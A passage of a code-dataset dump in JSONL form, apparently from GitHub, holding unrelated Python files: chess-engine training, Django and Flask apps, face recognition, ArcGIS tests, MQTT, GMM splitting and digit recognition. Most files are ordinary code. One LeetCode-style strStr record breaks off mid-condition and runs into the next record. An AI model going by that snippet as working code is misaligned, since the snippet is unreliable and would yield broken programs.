print(f\"Training process, game: {game_number+1}\")\n # training_history = model.fit(x_train, y_train, epochs=NUMBER_OF_EPOCHS_PER_GAME)\n \"\"\"Plotting history of training.\"\"\"\n # data = training_history.history\n # loss = data['loss']\n # policy_loss = data['policy_head_loss']\n # value_loss = data['value_head_loss']\n # plot_results(loss, policy_loss, value_loss, game_number, NUMBER_OF_EPOCHS_PER_GAME)\n print(f\"Saving model: iteration: {iteration + 1} - game: {game_number + 1}\")\n training_history = model.fit(x_general, y_general, epochs=NUMBER_OF_EPOCHS_PER_ITERATION)\n data = training_history.history\n loss = data['loss']\n policy_loss = data['policy_head_loss']\n value_loss = data['value_head_loss']\n # plot_results(loss, policy_loss, value_loss, number_of_games, NUMBER_OF_EPOCHS_PER_GAME)\n model.save('./models/' + model_name + '.keras')\n time_end = time()\n time_of_training = time_end - time_start\n save_history_result = add_record(NUMBER_OF_GAMES_PER_ITERATION * NUMBER_OF_ITERATION_IN_TRAINING, N_MCTS_ITERATION,\n draws, white_wins, black_wins, games_not_ended, str(time_of_training))\n if 
save_history_result:\n print(\"Data of training added successfully!\")\n else:\n print(\"Data of training didn't save successfully!\")\n\n print(\"Training has ended\")\n print(f\"Black wins: {black_wins}\")\n print(f\"White wins: {white_wins}\")\n print(f\"Draws: {draws}\")\n print(f\"Without result: {games_not_ended}\")\n print(f\"Training lasted {time_of_training} seconds.\")\n\n\nif __name__ == \"__main__\":\n train(model_name='model_12_res', number_of_iterations=NUMBER_OF_ITERATION_IN_TRAINING, number_of_games=NUMBER_OF_GAMES_PER_ITERATION)\n read_all()","repo_name":"GacinhoV33/Engineer_Thesis_Chess_Engine_With_Deep_Reinforcement_Learning","sub_path":"MyEngine/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7501,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"10705983030","text":"# initialize the global value used by this script\n\nglobalID = 0\nclass Player:\n def __init__(self, name, lastname, repr, weight, height):\n self.name = name\n self.lastname = lastname\n self.repr = repr\n self.weight = weight\n self.height = height\n global globalID # modify the global value\n globalID += 1 # global -> module-level counter, not tied to the Player class\n self.id = globalID # self -> the id of this particular object\n def calculateBMI(self):\n return self.weight/pow(self.height/100,2)\n def __str__(self):\n global globalID # read the global value\n return (\"| %3d |%10s | %10s | %10s | %10d | %10d | %10.2f\"\n % (self.id,\n self.name,\n self.lastname,\n self.repr,\n self.weight,\n self.height,\n self.calculateBMI()))\n\np1 = Player(\"Adam\", \"Małysz\", \"Pol\", 50, 165)\np2 = Player(\"Kamil\", \"Stoch\", \"Pol\", 75, 183)\np3 = Player(\"Jan\", \"rus\", \"Pol\", 70, 150)\np4 = Player(\"tata\", \"srata\", \"Pol\", 45, 167)\n\nprint(p1)\nprint(p2)\nprint(p3)\nprint(p4)\n\nplayers = [p1,p2,p3,p4]\ndef getPlayers():\n for player in players:\n print(player)\n\ndef findPlayerById(findId):\n for player in players:\n if(player.id == findId):\n print(player)\nprint()\nfindPlayerById(1)\n","repo_name":"andrzeji-oss/kursp","sub_path":"dzien4/dzien4_12.py","file_name":"dzien4_12.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"23996167442","text":"import tensorflow as tf\nimport cv2\nimport dlib\nimport numpy as np\nimport os\nimport random\nimport sys\nfrom sklearn.model_selection import train_test_split\n\nsize = 64\n\nx = tf.placeholder(tf.float32, [None, size, size, 3])\n\nkeep_prob_5 = tf.placeholder(tf.float32)\nkeep_prob_75 = tf.placeholder(tf.float32)\n\ndef weightVariable(shape):\n init = tf.random_normal(shape, stddev=0.01)\n return tf.Variable(init)\n\ndef biasVariable(shape):\n init = tf.random_normal(shape)\n return tf.Variable(init)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')\n\ndef maxPool(x):\n return tf.nn.max_pool(x, ksize=[1,2,2,1], strides=[1,2,2,1], padding='SAME')\n\ndef dropout(x, keep):\n return tf.nn.dropout(x, keep)\n\ndef cnnLayer():\n # layer 1\n W1 = weightVariable([3,3,3,32]) # kernel size (3,3), 3 input channels, 32 output channels\n b1 = biasVariable([32])\n # convolution\n conv1 = tf.nn.relu(conv2d(x, W1) + b1)\n # pooling\n pool1 = maxPool(conv1)\n # dropout: reduce overfitting by randomly skipping some weight updates\n drop1 = dropout(pool1, keep_prob_5)\n\n # layer 2\n W2 = weightVariable([3,3,32,64])\n b2 = biasVariable([64])\n conv2 = tf.nn.relu(conv2d(drop1, W2) + b2)\n pool2 = maxPool(conv2)\n drop2 = dropout(pool2, keep_prob_5)\n\n # layer 3\n W3 = weightVariable([3,3,64,64])\n b3 = biasVariable([64])\n conv3 = tf.nn.relu(conv2d(drop2, W3) + b3)\n pool3 = maxPool(conv3)\n drop3 = dropout(pool3, keep_prob_5)\n\n # fully connected layer\n Wf = weightVariable([8*16*32, 512])\n bf = biasVariable([512])\n drop3_flat = tf.reshape(drop3, [-1, 8*16*32])\n dense = tf.nn.relu(tf.matmul(drop3_flat, Wf) + bf)\n dropf = dropout(dense, keep_prob_75)\n\n # output layer\n Wout = weightVariable([512,2])\n bout = biasVariable([2])\n out = tf.add(tf.matmul(dropf, Wout), bout)\n return out\n\noutput = cnnLayer() \npredict = tf.argmax(output, 1) \n \nsaver = tf.train.Saver() \nsess = tf.Session() \nsaver.restore(sess, tf.train.latest_checkpoint(r'E:\\VS\\QT\\AI\\x64\\Release\\FaceDetection\\checkpoint')) \n \ndef is_my_face(image): \n res = sess.run(predict, feed_dict={x: [image/255.0], keep_prob_5:1.0, keep_prob_75: 1.0}) \n if res[0] == 1: \n return True \n else: \n return False \n\n# use dlib's bundled frontal_face_detector as the feature extractor (left commented out; the Haar cascade below is used instead)\n# detector = dlib.get_frontal_face_detector()\nhaar = cv2.CascadeClassifier(r'D:\\soft\\study\\opencv\\opencv\\build\\install\\etc\\haarcascades\\haarcascade_frontalface_default.xml')\ncam = cv2.VideoCapture(0) \n\ndef detection_face():\n\tisDetect = True\n\twhile isDetect:\n\t\t_, img = cam.read()\n\t\tgray_image = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\tfaces = haar.detectMultiScale(gray_image, 1.3, 5)\n\t\tcv2.imshow('img', img)\n\t\tkey = cv2.waitKey(30) & 0xff\n\t\tif key == 27:\n\t\t\tsys.exit(0)\n\t\t\t\t\n\t\tfor f_x, f_y, f_w, f_h in faces:\n\t\t\tface = img[f_y:f_y+f_h, f_x:f_x+f_w]\n\t\t\tface = cv2.resize(face, (size,size))\n\t\t\tif is_my_face(face):\n\t\t\t\tisDetect = False\n\t\t\t\tbreak\n\t\t\t# cv2.rectangle(img, (x2,x1),(y2,y1), (255,0,0),3)\n\t\t\t# cv2.imshow('image',img)\n\t\t\t# key = cv2.waitKey(30) & 0xff\n\t\t\t# if key == 27:\n\t\t\t\t# sys.exit(0)\n\t\t\t\t\n\tsess.close() \n \ndetection_face()","repo_name":"mrcao20/AI","sub_path":"AI/FaceDetection/is_my_face.py","file_name":"is_my_face.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"33633041336","text":"import os\nimport sys\nimport shutil\nimport unittest\nimport datetime\n\nimport arcpy\n\nimport amaptor\nimport geodatabase_tempfile\n\nimport scripts.exceptions\nfrom arcproject import scripts\nfrom arcproject.scripts import mapping\nfrom arcproject.waterquality import classes\nfrom arcproject.scripts import config\n\nfolder_path = os.path.dirname(os.path.abspath(__file__))\n\nclass BaseMapTest(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.session = classes.get_new_session()\n\t\tself.query = self.session.query(classes.WaterQuality).filter(classes.WaterQuality.site_id == 1)\n\t\tself.output = os.path.join(folder_path, \"test_export_folder\", \"test_wq.shp\")\n\n\tdef test_query_to_shp(self):\n\n\t\t# clean up before test\n\t\tif arcpy.Exists(self.output):\n\t\t\tarcpy.Delete_management(self.output)\n\n\t\tmapping.query_to_features(self.query, self.output)\n\n\tdef test_mapping_by_date(self):\n\t\tdate_with_records = datetime.datetime.strptime(\"04/04/2013\", \"%m/%d/%Y\")\n\t\tdate_without_records = datetime.datetime.strptime(\"01/01/2012\", \"%m/%d/%Y\")\n\n\t\tmapping.layer_from_date(date_with_records, os.path.join(folder_path, \"test_export_folder\", \"test_export_for_date.shp\"))\n\n\t\tself.assertRaises(scripts.exceptions.NoRecordsError, mapping.layer_from_date, date_without_records, 
os.path.join(\"test_export_folder\", \"test_export_for_date.shp\"))\n\n\nclass TestMakeNewMap(unittest.TestCase):\n\tdef test_pro_new_map(self):\n\n\t\tif amaptor.ARCMAP: # this test is ArcGIS Pro specific\n\t\t\treturn\n\n\t\ttoolbox_path = os.path.join(folder_path, \"arcproject_toolbox.py\")\n\t\tshutil.copyfile(os.path.join(config.arcwqpro, \"wq-processing-toolbox.pyt\"), toolbox_path)\n\t\tsys.path.append(folder_path)\n\n\t\timport arcproject_toolbox\n\t\tarcproject_toolbox.testing_project = os.path.join(folder_path, \"testfiles\", \"blank_pro_project_working.aprx\")\n\t\ttry:\n\t\t\tshutil.copyfile(os.path.join(folder_path, \"testfiles\", \"blank_pro_project.aprx\"), arcproject_toolbox.testing_project)\n\n\t\t\tclass param(object):\n\t\t\t\tdef __init__(self, value=None):\n\t\t\t\t\tself.valueAsText = str(value)\n\t\t\t\t\tself.value = value\n\n\t\t\ttool = arcproject_toolbox.GenerateMap()\n\n\t\t\tparams = [param(2016), param(\"May\"), param(\"CHL\"), param(\"testing_map\"), param(), param()]\n\t\t\ttool.execute(parameters=params, messages=None)\n\t\tfinally:\n\t\t\tos.remove(toolbox_path)\n\t\t\tos.remove(arcproject_toolbox.testing_project)\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","repo_name":"ucd-cws/arcproject-wq-processing","sub_path":"arcproject/scripts/tests/test_mapping.py","file_name":"test_mapping.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"27273822150","text":"#Needed because powershell ConvertFrom-Json is dumb and treats 'A' and 'a' as the same.\n\nfrom pokedata import Sprite\n\nclass Font:\n def __init__(self,addr,char):\n self.addr = addr\n self.char = char\n self.sprite = Sprite.decode1BPP(addr,1,1)\n\n def to_json(self):\n return {\n 'char' : self.char,\n 'sprite' : self.sprite.to_json()\n }","repo_name":"super-phreak/poshmon","sub_path":"poshmon-tools/font.py","file_name":"font.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"32117783165","text":"import json\n\nfrom drf_yasg import openapi\nfrom rest_framework import viewsets, status\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom django.contrib.gis.geos import Point\n\nfrom providers_service_area.models import Provider, ServiceArea\nfrom providers_service_area.serializers import ProviderSerializer, ServiceAreaSerializer, ResultsSerializer\n\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.cache import cache_page\nfrom drf_yasg.utils import swagger_auto_schema\n\n\n\n@method_decorator(name='list',\n decorator=swagger_auto_schema(\n operation_description=\"List All Providers\",\n operation_summary=\"list\")\n )\n@method_decorator(name='create',\n decorator=swagger_auto_schema(\n operation_description=\"Create new Provider\",\n operation_summary=\"create\")\n )\n@method_decorator(name='retrieve',\n decorator=swagger_auto_schema(\n operation_description=\"Retrieve Provider by id\",\n operation_summary=\"retrieve\")\n )\n@method_decorator(name='update',\n decorator=swagger_auto_schema(\n operation_description=\"Update Provider by id\",\n operation_summary=\"update\")\n )\n@method_decorator(name='destroy',\n decorator=swagger_auto_schema(\n operation_description=\"Destroy Provider by id\",\n operation_summary=\"destroy\")\n )\n@method_decorator(name='partial_update',\n 
decorator=swagger_auto_schema(auto_schema=None)\n )\n\nclass ProviderViewSet(viewsets.ModelViewSet):\n \"\"\"\n Provider Resource\n\n This viewset automatically provides `list`, `create`, `retrieve`,\n `update` and `destroy` actions.\n \"\"\"\n serializer_class = ProviderSerializer\n queryset = Provider.objects.all()\n\n@method_decorator(name='list',\n decorator=swagger_auto_schema(\n operation_description=\"List All Service Areas\",\n operation_summary=\"list\")\n )\n@method_decorator(name='create',\n decorator=swagger_auto_schema(\n operation_description=\"Create new Service Area\",\n operation_summary=\"create\")\n )\n@method_decorator(name='retrieve',\n decorator=swagger_auto_schema(\n operation_description=\"Retrieve Service Area by id\",\n operation_summary=\"retrieve\")\n )\n@method_decorator(name='update',\n decorator=swagger_auto_schema(\n operation_description=\"Update Service Areas by id\",\n operation_summary=\"update\")\n )\n@method_decorator(name='destroy',\n decorator=swagger_auto_schema(\n operation_description=\"Destroy Service Area by id\",\n operation_summary=\"destroy\")\n )\n@method_decorator(name='partial_update',\n decorator=swagger_auto_schema(auto_schema=None)\n )\nclass ServiceAreaViewSet(viewsets.ModelViewSet):\n \"\"\"\n Service Area Resource\n\n This viewset automatically provides `list`, `create`, `retrieve`,\n `update` and `destroy` actions.\n \"\"\"\n serializer_class = ServiceAreaSerializer\n queryset = ServiceArea.objects.all()\n\n # Cache Request for 2 hours\n long = openapi.Parameter('long', in_=openapi.IN_QUERY, description='string', type=openapi.TYPE_STRING,)\n lat = openapi.Parameter('lat', in_=openapi.IN_QUERY, description='string', type=openapi.TYPE_STRING,)\n\n\n @swagger_auto_schema(operation_id=\"get_providers_in_the_area\",\n manual_parameters=[lat, long],\n responses={200: ResultsSerializer(many=True)},\n operation_summary=\"\")\n @method_decorator(cache_page(60 * 60 * 2))\n @action(detail=False, methods=['get'], name=\"Get providers in the area\")\n def get_providers_in_the_area(self, request):\n \"\"\"\n Endpoint that takes a lat/lng pair as arguments and return a list of all polygons that include the given lat/lng\n \"\"\"\n x_coords = request.GET.get('long', None)\n y_coords = request.GET.get('lat', None)\n if x_coords and y_coords:\n location = Point(float(x_coords), float(y_coords), srid=4326)\n providers_in_the_area = ServiceArea.objects.filter(area__contains=location)\n serialized = ResultsSerializer(providers_in_the_area, many=True)\n return Response(serialized.data, status=status.HTTP_200_OK)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"ineedme/mozio","sub_path":"providers_service_area/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25209263383","text":"import random\nimport requests\nimport http.client\nimport numpy as np\nfrom flask import Flask\nfrom flask import request, escape, render_template\n\napp = Flask(__name__)\n\ndef getData(ID, ID_Data):\n \"\"\" Converts the data sent by the server into the original message\n\n Parameters\n ----------\n ID : list(:float)\n ID of the client\n ID_Data: list(:float)\n Array containing ID embedded with data\n\n Returns\n -------\n str\n The data which was published by the client with the specified ID\n\n \"\"\"\n # print(ID_Data)\n # print(ID)\n data = np.multiply(np.array(ID_Data) - np.array(ID), np.array(ID))\n curr = \"\"\n 
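# A minimal sketch of the decode step below, assuming an ID vector with entries in {-1, +1}:\n # element-wise, (ID_Data - ID) * ID recovers the embedded value (an element carrying no bit\n # yields 0 or -1, and the isclose(-1) correction maps the -1 case to 0; an element carrying\n # a bit yields 1). The resulting 0/1 digits are then consumed 8 at a time and converted to\n # characters, e.g. int('01100001', 2) == 97 and chr(97) == 'a'.\n 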
data[np.isclose(data, -1)] = 0\n # print(data)\n dataBinary = []\n for i in range(len(data)):\n \n if i and i % 8 == 0:\n dataBinary.append(curr)\n curr = \"\"\n curr += str(int(data[i]))\n print(dataBinary)\n dataString1 = list(map(lambda x: chr(int(x, 2)), dataBinary))\n return \"\".join(dataString1)\n\ndef fetchDataFromPubServer(ID_arr):\n \"\"\" Sends the client ID to the Pub/Sub server to fetch the published data\n\n Parameters\n ----------\n ID_arr : list(:float)\n ID of the client\n\n Returns\n -------\n str\n The data which was published by the client with the sppecified ID\n\n \"\"\"\n pubSubURL = \"http://localhost:7001/fetchData\"\n myData = {\"ID\": ID_arr}\n clientIDData = requests.post(pubSubURL, json=myData).json()[\"data\"]\n print(clientIDData)\n if clientIDData:\n data = getData(ID_arr, clientIDData)\n else:\n data = None\n print(data)\n return data\n\ndef fetchIDFromClientURL(clientURL: str):\n \"\"\" Fetches Client ID from the specified client URL\n\n Parameters\n ----------\n clientURL : str\n URL of the client to fetch ID from\n\n Returns\n -------\n list(:float)\n A float array containing the ID\n\n \"\"\"\n conn = http.client.HTTPConnection(clientURL)\n conn.request('GET', '/')\n\n resp = conn.getresponse()\n content = resp.read()\n\n conn.close()\n\n text = content.decode('utf-8')\n\n ID_arr = text.split(\" \")\n ID_arr = list(map(float, ID_arr))\n return ID_arr\n\n\n@app.route(\"/\")\ndef index():\n \"\"\"\n The function index is a callback for when a user lands on the homepage URL: 127.0.0.1:6001\n\n It loads an input form to enter the URL of the client. It then fetched the ID from that URL\n and queries the Publish Subscribe server to fetch the Data\n \"\"\"\n clientURL = request.args.get(\"ClientURL\", \"\")\n data = \"\"\n if clientURL:\n ID_arr = fetchIDFromClientURL(clientURL)\n data = fetchDataFromPubServer(ID_arr)\n # return (\n # \"\"\"
\n # \n # \n #
\"\"\"\n # + clientURL\n # + (data if data else \"No client data found\")\n # )\n\n return render_template(\"index.html\", data=data)\n\nif __name__ == \"__main__\":\n app.run(host=\"127.0.0.1\", port=6001, debug=True)\n","repo_name":"mahnoormmalik/client-receiver","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39483890951","text":"\nclass Solution:\n def strStr(self, haystack: str, needle: str) -> int:\n j=0\n ans=-1\n if(len(haystack) tuple:\n\n X_list = [] # create an empty list to store the features\n Y_list = [] # create an empty list to store the labels\n df = pd.read_csv(data_path) # read the data from the specified file\n for index in df.index: # loop over each row in the data frame\n X_piece = np.array(df.loc[index,['X','Y','1th','day','FFMC','DMC','DC','ISI','temp','RH','wind','rain',]]) # extract the features as a numpy array\n X_list.append(X_piece) # append the features to the list\n Y_piece = int(df.loc[index,['area']]) # extract the label\n Y_list.append(Y_piece) # append the label to the list\n\n X = np.array(X_list) # convert the list of features to a numpy array\n\n #######################################################################\n #### 2023.3.29 update: normalize the data, so that each dimension has zero mean and unit variance\n #######################################################################\n if is_normalized: # if the normalize flag is set to True\n for i in range(0, X.shape[-1]):\n X[:, i] = (X[:, i] - X[:, i].mean()) / X[:, i].std()\n #######################################################################\n\n if is_bias: # if the bias flag is set to True\n X = np.concatenate([np.ones((len(X_list),1)),X],axis=1).astype(np.float32) # add a column of ones to the features as the bias term\n else: # if the bias flag is set to False\n X = X.astype(np.float32) # cast the features as a float32 numpy array\n Y = np.array(Y_list,dtype=np.float32) # convert the list of labels to a float32 numpy array\n Y = np.log(Y+1) # apply logarithmic transformation to the labels\n\n #shuffle\n if is_shuffle: # if the shuffle flag is set to True\n indexes = np.arange(0,len(X),1,dtype=np.int32) # create an array of indexes for the samples\n np.random.shuffle(indexes) # shuffle the indexes randomly\n X = X[indexes] # shuffle the features based on the shuffled indexes\n Y = Y[indexes] # shuffle the labels based on the shuffled indexes\n\n # print(X.mean())\n # print(X.var())\n\n X_train = X[:train_sample_num] # extract the training features from the beginning of the numpy array\n Y_train = Y[:train_sample_num] # extract the training labels from the beginning of the numpy array\n X_test = X[-test_sample_num:] # extract the testing features from the end of the numpy array\n Y_test = Y[-test_sample_num:] # extract the testing labels from the end of the numpy array\n\n return X_train,X_test,Y_train,Y_test # return the training and testing features and labels as a tuple\n","repo_name":"nantsing/LinearModelRegression","sub_path":"dataset/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14032262180","text":"from enum import Enum\n\nclass BookEnum(Enum):\n Available = 0\n Reserved = 1\n CheckedOut = 2\n \nclass Book:\n def __init__(self, id, title, author, status = BookEnum.Available):\n self.id = id\n 
self.title = title\n self.author = author\n self.status = status\n \n def reserve(self):\n self.status = BookEnum.Reserved\n \n def checkout(self):\n self.status = BookEnum.CheckedOut\n \n def returnBook(self):\n self.status = BookEnum.Available\n \nbooks = [\n Book(1, 'Harry Potter', 'JK Rowling', BookEnum.Available),\n Book(2, 'Golden Compass', 'Christopher Paoli', BookEnum.Reserved),\n Book(3, 'Dumbledore Dinner', 'JK Rowling', BookEnum.Available),\n Book(4, 'Lord of the Rings', 'Einstein', BookEnum.Available),\n Book(5, 'Toy Story', 'Disneyworld', BookEnum.CheckedOut),\n Book(6, 'Dune', 'Henry Ford', BookEnum.Available),\n Book(7, 'Random Age', 'Neil Pink', BookEnum.Available),\n]","repo_name":"AlexanderDLe/Python_DataStructuresAndAlgorithms","sub_path":"ObjectOrientation/LibraryManagementSystem/Book.py","file_name":"Book.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14536629114","text":"from datetime import datetime\nimport ElasticEmail\nfrom ElasticEmail.api import statistics_api\nfrom pprint import pprint\n\n# Defining the host is optional and defaults to https://api.elasticemail.com/v4\nconfiguration = ElasticEmail.Configuration()\n\n# Configure API key authorization: apikey\nconfiguration.api_key['apikey'] = 'YOUR_API_KEY'\n\n\"\"\"\nLoad statistics\nExample api call that loads basic statistics.\n\"\"\"\nwith ElasticEmail.ApiClient(configuration) as api_client:\n # Create an instance of the API class\n api_instance = statistics_api.StatisticsApi(api_client)\n \n _from = datetime(2022,1,1,00,00,00) # datetime | Starting date for search in YYYY-MM-DDThh:mm:ss format.\n to = datetime(2022,1,30,00,00,00) # datetime | Ending date for search in YYYY-MM-DDThh:mm:ss format. 
(optional)\n\n # only from date:\n try:\n # Load Statistics\n api_response = api_instance.statistics_get(_from)\n print(\"From %s\" % _from)\n pprint(api_response)\n except ElasticEmail.ApiException as e:\n print(\"Exception when calling StatisticsApi->statistics_get: %s\\n\" % e)\n\n # from and to dates:\n try:\n api_response = api_instance.statistics_get(_from, to=to)\n print(f\"\\nFrom {_from} To {to}\")\n pprint(api_response)\n except ElasticEmail.ApiException as e:\n print(\"Exception when calling StatisticsApi->statistics_get: %s\\n\" % e)","repo_name":"ElasticEmail/elasticemail-python","sub_path":"examples/functions/loadStatistics.py","file_name":"loadStatistics.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"31596143672","text":"#!/usr/bin/env python\nfrom setuptools import setup\nfrom setuptools.command.test import test as TestCommand\nimport sys\nimport io\n\nclass PyTest(TestCommand):\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_args = ['tests']\n self.test_suite = True\n def run_tests(self):\n #import here, cause outside the eggs aren't loaded\n import pytest\n errno = pytest.main(self.test_args)\n sys.exit(errno)\n\nsetup(\n name='eece411-kvclient',\n version='0.1.0',\n url='',\n license=io.open('LICENSE').read(),\n author='Tyler Jones',\n author_email='tyler@squirly.ca',\n description='Key Value client for EECE 411.',\n long_description=io.open('README.rst').read(),\n packages=['kvclient'],\n install_requires=[],\n tests_require=['pytest', 'mock'],\n cmdclass={'test': PyTest},\n)\n","repo_name":"rockyhe/rockykevinleon","sub_path":"eece411/phase2/src/phase2Pack/eece411-kvclient/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16900622637","text":"import time\nimport os\nimport sys\nimport paho.mqtt.client as mqtt\nimport threading\nfrom datetime import datetime\n\nclass MqttPublisher(threading.Thread):\n def __init__(self, logging, broker=\"localhost\", port=1883):\n self.logging = logging\n\n threading.Thread.__init__(self)\n\n self.broker = broker\n self.port = port\n self.client = mqtt.Client()\n # self.client.on_publish = self.on_publish\n\n def run(self):\n while True:\n try:\n self.logging.info(\"Attempting to connect to MttqPublisher on {}:{}\".format(self.broker, self.port))\n self.client.connect(self.broker, self.port)\n self.client.loop_start()\n except OSError as err:\n print(\"OS error: {0}\".format(err))\n except Exception as err:\n self.logging.info(\"... Failed to connect. 
Try again in 10s {0}\".format(err))\n\n time.sleep(10)\n\n def publish(self, topic, msg):\n now = datetime.utcnow()\n payload = \"{},{}\".format(now.strftime(\"%Y-%m-%d %H:%M:%S.%f\"), msg)\n\n self.client.publish(topic, payload=payload, qos=1, retain=True)\n # self.logging.info(\"MttqPublisher sending: {} for topic: {}\".format(payload, topic))\n\n def on_publish(self, client, userdata, mid):\n # self.logging.info(\"Mttq published!\")\n pass\n","repo_name":"matzpersson/fleetmetrics","sub_path":"simulator/lib/Mqtt.py","file_name":"Mqtt.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8385505579","text":"import numpy as np\r\nimport numpy.linalg as nplnalg\r\nimport scipy.linalg as sclnalg\r\nfrom uq.quadratures import cubatures as uqcub\r\nfrom uq.gmm import gmmbase as uqgmmbase\r\nfrom uq.gmm import splitter as uqsplit\r\n\r\ndef splitGMM_ryanruss(gmm,f,N,ruleoption,maxlvl):\r\n # f is the nonlinear function\r\n # max number of times to split: maxlvl\r\n for mxl in range(maxlvl):\r\n h = np.sqrt(3)\r\n Ncmop = gmm.Ncomp\r\n G = uqgmmbase.GMM(None,None,None,gmm.currt)\r\n for i in range(Ncmop):\r\n fmu = f(gmm.m(i))\r\n S = sclnalg.sqrtm(gmm.P(i))\r\n invS = nplnalg.inv(S)\r\n phi=[0]*S.shape[1]\r\n for j in range(S.shape[1]):\r\n avec = S[:,j]\r\n avecnorm = avec/nplnalg.norm(avec)\r\n avecnormMag = 1/nplnalg.norm(np.matmul(invS,avecnorm))\r\n phi[j] = ( f(gmm.m(i)+h*avecnormMag*avecnorm)+f(gmm.m(i)-h*avecnormMag*avecnorm)-2*fmu )/(2*h**2)\r\n \r\n phinorms = [nplnalg.norm(phi[e]) for e in range(S.shape[1])]\r\n # print(phinorms)\r\n j=np.argmax(phinorms)\r\n avec = S[:,j]\r\n gmmcomp=uqsplit.splitGaussianND_principleAxis_ryanruss(avec,gmm.m(i),gmm.P(i),N,ruleoption)\r\n gmmcomp.currt = gmm.currt\r\n gmmcomp.scaleWt(gmm.w(i))\r\n G.appendGMM(gmmcomp)\r\n \r\n gmm = G\r\n \r\n return gmm\r\n\r\n","repo_name":"nadurthi/ResearchCodes","sub_path":"turtlebot/uq/gmm/gmmsplitteralgos.py","file_name":"gmmsplitteralgos.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32886604081","text":"from django import forms\nfrom .models import CSVData, Question, Answer\n\nclass UploadCSVForm(forms.ModelForm):\n csv_file = forms.FileField()\n\n class Meta:\n model = CSVData\n fields = ['csv_file']\n\nclass QuestionForm(forms.ModelForm):\n class Meta:\n model = Question\n fields = ['question_text', 'question_type']\n\nclass AnswerForm(forms.ModelForm):\n class Meta:\n model = Answer\n fields = [] # Start with an empty list of fields\n\n def __init__(self, *args, csv_data_id=None, **kwargs):\n super().__init__(*args, **kwargs)\n if csv_data_id:\n questions = Question.objects.filter(csv_data_id=csv_data_id)\n for question in questions:\n field_name = f'question_{question.id}'\n self.fields[field_name] = forms.CharField(\n label=question.question_text, required=True\n )","repo_name":"morisy/crowdpleaser","sub_path":"crowdsourcing_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26021409346","text":"import cv2\r\nimport imutils\r\nfrom imutils.perspective import four_point_transform\r\nfrom imutils import contours\r\n\r\n#define the dictionary of 7-segment display\r\nDIGITS_LOOKUP = {\r\n (1,1,1,0,1,1,1):0,\r\n (0,0,1,0,0,1,0):1,\r\n (1,0,1,1,1,1,0):2,\r\n 
(1,0,1,1,0,1,1):3,\r\n (0,1,1,1,0,1,0):4,\r\n (1,1,0,1,0,1,1):5,\r\n (1,1,0,1,1,1,1):6,\r\n (1,0,1,0,0,1,0):7,\r\n (1,1,1,1,1,1,1):8,\r\n (1,1,1,1,0,1,1):9,\r\n }\r\n#image pre-processing\r\nimg = cv2.imread('digitRecognition.jpg')\r\nimg = imutils.resize(img,height = 500)\r\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\nblurred = cv2.GaussianBlur(gray,(5,5),0)\r\nedged = cv2.Canny(blurred,50,200)\r\n#cv2.imshow('image',img)\r\n#cv2.imshow('edged',edged)\r\n\r\n#find contours and sort them according to their size in decreasing order\r\ncnts = cv2.findContours(edged.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\r\ncnts = imutils.grab_contours(cnts)\r\ncnts = sorted(cnts,key=cv2.contourArea,reverse=True)\r\ndisplayCnt = None\r\nfor c in cnts:\r\n #contour approximation\r\n peri = cv2.arcLength(c,True)\r\n approx = cv2.approxPolyDP(c,0.02*peri,True)\r\n #if contour has 4 vertices, we have found the digital display\r\n if len(approx) == 4:\r\n displayCnt = approx\r\n break\r\n#extract display\r\nwarped = four_point_transform(gray,displayCnt.reshape(4,2))\r\noutput = four_point_transform(img,displayCnt.reshape(4,2))\r\n#cv2.imshow('warped',warped)\r\n#threshold the image and apply morphological transforms to clean-up the image\r\nthresh = cv2.threshold(warped,127,255,cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]\r\nkernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(1,5))\r\nthresh = 